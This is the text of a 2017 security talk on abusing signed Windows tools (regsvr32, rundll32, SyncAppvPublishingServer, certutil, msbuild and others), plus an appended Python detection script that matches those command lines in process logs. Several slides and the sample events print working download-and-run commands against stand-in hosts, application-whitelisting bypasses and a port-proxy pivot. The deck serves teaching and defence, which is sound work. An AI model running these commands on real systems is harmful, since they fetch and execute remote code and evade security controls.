
Hacking Windows with Windows – Advanced attacks


Talk given for the Office 365 User Group in Agder, 14 September 2017


  1. Hacking Windows with Windows – Advanced attacks MTUG 10.09.2017
  2. WHOAMI • Geek/Pentester/Security researcher/IT-Pro/MVP/Speaker • Have worked in IT since 2000 • First MCP when I was 16 • Work @ Advania – Chief Technical Architect • Married/kids/dog • Blog: http://oddvar.moe • Twitter: @oddvarmoe
  3. Attack – how to get initial access • Traditional attack • Send mail • Link • Attachment • Phishing page • External server • OWA • ADFS • Skype • Third party
  4. Need more examples? • https://onedrive.live.com/?authkey=%21ADev0bfQMNxv504&cid=C96A3EEDCE316E4C&id=C96A3EEDCE316E4C%21114&parId=C96A3EEDCE316E4C%21109&o=OneUp
  5. Call to Action!
  6. Call to Action! • Setting in Office (2013/2016)
  7. What is behind Enable Content? • Here comes the interesting part • What do they do? • We will look at a number of examples • Real attacks • «Future attacks»
  8. What do you mean by «Hacking Windows with Windows»? • Attackers have shifted focus • They use built-in Windows functionality to carry out attacks • They abuse approved, signed tools • No longer malware.exe
  9. REGSVR32.exe • regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll • Proxy aware
  10. REGSVR32.exe • Calculator: • regsvr32 /s /n /u /i:https://gist.githubusercontent.com/api0cradle/1409e8f00ae51dd6b736b30947a3d0c2/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Minimalist.sct scrobj.dll
  11. rundll32.exe • rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('User%20Group%20Agder'); • (Now caught by Windows Defender) • Detailed explanation: https://stackoverflow.com/questions/25131484/rundll32-exe-javascript
  12. Rundll32.exe • Calculator: • rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
  13. SyncAppvPublishingServer.exe • SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX • Command injection bug
  14. SyncAppvPublishingServer.exe • Calculator: • SyncAppvPublishingServer.exe "n;(calc) • cmd.exe /c cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'" • Proof that it really is PowerShell: • SyncAppvPublishingServer.exe "n;(get-service | out-gridview)
  15. Certutil.exe • certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe • certutil.exe /decode base64kodetfil.txt x64.dll • certutil -Class scrobj.dll
  16. Some others without a demo • msbuild.exe pshell.xml • regsvcs.exe /U regsvcs.dll • regsvcs.exe regsvcs.dll • regasm.exe /U regsvcs.dll • regasm.exe regsvcs.dll • InstallUtil.exe /logfile= /LogToConsole=false /U MYDLL.dll • msxsl.exe customers.xml script.xsl
  17. My research • BGINFO.exe: bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt • Video: https://youtu.be/OiKhgSxWKUM • CMSTP.exe: UAC bypass and DLL loading • https://msitpros.com/wp-content/uploads/2017/08/WebDavDLLLoadBlog.gif
  18. My research • CVE-2017-8625 • hh.exe /? (What do you think this does?) • Device Guard bypass • https://msitpros.com/wp-content/uploads/2017/08/CVE-2017-8625.gif
  19. Code in code
  20. EXE files that can start other EXE files • Examples: • scriptrunner.exe -appvscript calc.exe • forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe • ieexec.exe http://x.x.x.x:8080/bypass.exe (.NET exe) • bash.exe -c calc.exe (Linux on Windows)
  21. Proxy • netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112
  22. What should you do? • Application whitelisting • Device Guard • AppLocker • Remember my AppLocker bypass list: • https://github.com/api0cradle/UltimateAppLockerByPassList • Implement detection (Splunk / WDATP / ATA)
  23. EVEN IF YOU CAN ROB A BANK WITH PEN AND PAPER, THAT DOES NOT MEAN YOU SHOULD NOT HAVE A VAULT!
  24. SHAMELESS PLUG!
  25. Thank you!
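Slide 22 asks for detection of the command lines shown on slides 9 to 21. The block below is an added example, not code from the talk or its author, of what that detection logic looks like when run over process-creation telemetry: each rule is gated on the image basename of the signed binary and fires on the argument shapes the slides demonstrate (scrobj.dll and `/i:` with a remote source for regsvr32, `javascript:` and `RunHTMLApplication` for rundll32, a quoted argument containing `;` for SyncAppvPublishingServer, `-urlcache`/`-decode` for certutil, and so on). Hits are raised to high or critical when the command line pulls from a remote source or the parent is an Office application, which is the "enable content" chain from slides 5 to 7. The tab-separated key=value log format, the rule names, the OFFICE_PARENTS set and the sample events are all constructed for this example.

```python
"""Flag the living-off-the-land command lines from the deck in process-creation events.

Example code written for this page, not the talk's own tooling. The log layout,
rule names and severity scheme are assumptions; the sample events are constructed.
"""
import re
from typing import Dict, FrozenSet, Iterable, List, NamedTuple


class Rule(NamedTuple):
    name: str
    images: FrozenSet[str]   # lower-case image basenames the rule is gated on
    pattern: "re.Pattern"    # searched in the full command line, case-insensitive


class Finding(NamedTuple):
    rule: str
    severity: str
    image: str
    parent: str
    command_line: str


def _r(name: str, images: Iterable[str], regex: str) -> Rule:
    return Rule(name, frozenset(images), re.compile(regex, re.I))


# Each pattern mirrors the argument shape shown on the corresponding slide.
RULES: List[Rule] = [
    _r("regsvr32_scriptlet", ["regsvr32.exe"], r"scrobj\.dll|[/-]i:\s*(https?:|\\\\)"),
    _r("rundll32_script_or_shellexec", ["rundll32.exe"],
       r"javascript:|mshtml(\.dll)?\s*,\s*RunHTMLApplication|ShellExec_RunDLL"),
    _r("syncappv_command_injection",
       ["syncappvpublishingserver.exe", "cscript.exe", "wscript.exe"],
       r'syncappvpublishingserver(\.exe|\.vbs)?\s+"[^"]*;'),
    _r("certutil_download_or_decode", ["certutil.exe"], r"[/-](urlcache|decode|encode)\b"),
    _r("dotnet_tool_code_execution",
       ["msbuild.exe", "regsvcs.exe", "regasm.exe", "installutil.exe", "msxsl.exe"],
       r"\.(xml|csproj|proj|dll|xsl)\b|[/-]u\b"),
    _r("signed_binary_launches_exe",
       ["scriptrunner.exe", "forfiles.exe", "ieexec.exe", "bash.exe"],
       r"-appvscript|[/-]c\s|https?://|\.exe\b"),
    _r("netsh_portproxy_added", ["netsh.exe"], r"interface\s+portproxy\s+add"),
]

# A hit spawned by an Office process means a user clicked Enable Content (assumed set).
OFFICE_PARENTS = frozenset({"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"})
# Payload fetched over HTTP(S) or from a UNC path, as on slides 9, 13, 15 and 17.
REMOTE_SOURCE = re.compile(r"https?://|\\\\", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased; accepts both slash styles."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_line(line: str) -> Dict[str, str]:
    """Tab-separated key=value fields (a made-up export format, not Sysmon's own)."""
    fields: Dict[str, str] = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def evaluate(event: Dict[str, str]) -> List[Finding]:
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits: List[Finding] = []
    for rule in RULES:
        if image in rule.images and rule.pattern.search(cmd):
            # medium by default; +1 for an Office parent, +1 for a remote source
            score = int(parent in OFFICE_PARENTS) + int(bool(REMOTE_SOURCE.search(cmd)))
            severity = ("medium", "high", "critical")[score]
            hits.append(Finding(rule.name, severity, image, parent, cmd))
    return hits


def scan(lines: Iterable[str]) -> List[Finding]:
    return [hit for line in lines for hit in evaluate(parse_line(line))]


def count_by_severity(findings: Iterable[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


def _ev(image: str, cmd: str, parent: str) -> str:
    return "\t".join(("Image=" + image, "CommandLine=" + cmd, "ParentImage=" + parent))


SYS32 = r"C:\Windows\System32"
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
# Constructed events: the first eight are the deck's commands, the last three are benign.
SAMPLE_LOG = [
    _ev(SYS32 + r"\regsvr32.exe", "regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll", OFFICE + r"\WINWORD.EXE"),
    _ev(SYS32 + r"\rundll32.exe", r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(1);', SYS32 + r"\cmd.exe"),
    _ev(SYS32 + r"\SyncAppvPublishingServer.exe",
        r'''SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"''',
        OFFICE + r"\EXCEL.EXE"),
    _ev(SYS32 + r"\cscript.exe",
        r'''cscript.exe SyncAppVPublishingServer.vbs ".; Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL calc.exe'"''',
        SYS32 + r"\cmd.exe"),
    _ev(SYS32 + r"\certutil.exe", "certutil.exe -urlcache -split -f http://www.7-zip.org/a/7z1701.exe 7zip.exe", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"),
    _ev(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "msbuild.exe pshell.xml", SYS32 + r"\cmd.exe"),
    _ev(SYS32 + r"\forfiles.exe", r"forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe", SYS32 + r"\cmd.exe"),
    _ev(SYS32 + r"\netsh.exe", "netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112", SYS32 + r"\cmd.exe"),
    _ev(SYS32 + r"\regsvr32.exe", r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"', SYS32 + r"\msiexec.exe"),
    _ev(SYS32 + r"\certutil.exe", "certutil -verify server.cer", SYS32 + r"\mmc.exe"),
    _ev(SYS32 + r"\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL desk.cpl", SYS32 + r"\explorer.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity:8}] {f.rule:30} {f.parent} -> {f.image}: {f.command_line}")
```

Two design points matter when moving this into Splunk, WDATP or ATA. First, gate on the image path rather than the typed command name: slide 20's `forfiles` and slide 16's `msbuild.exe` appear in telemetry as the full System32 or Framework64 path, which is why `basename` is applied before matching. Second, the dotnet_tool rule is deliberately noisy (regasm.exe and regsvcs.exe legitimately take .dll arguments during installs), so baseline it against software deployment and let the parent-process and remote-source scoring, not the raw match, drive paging.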
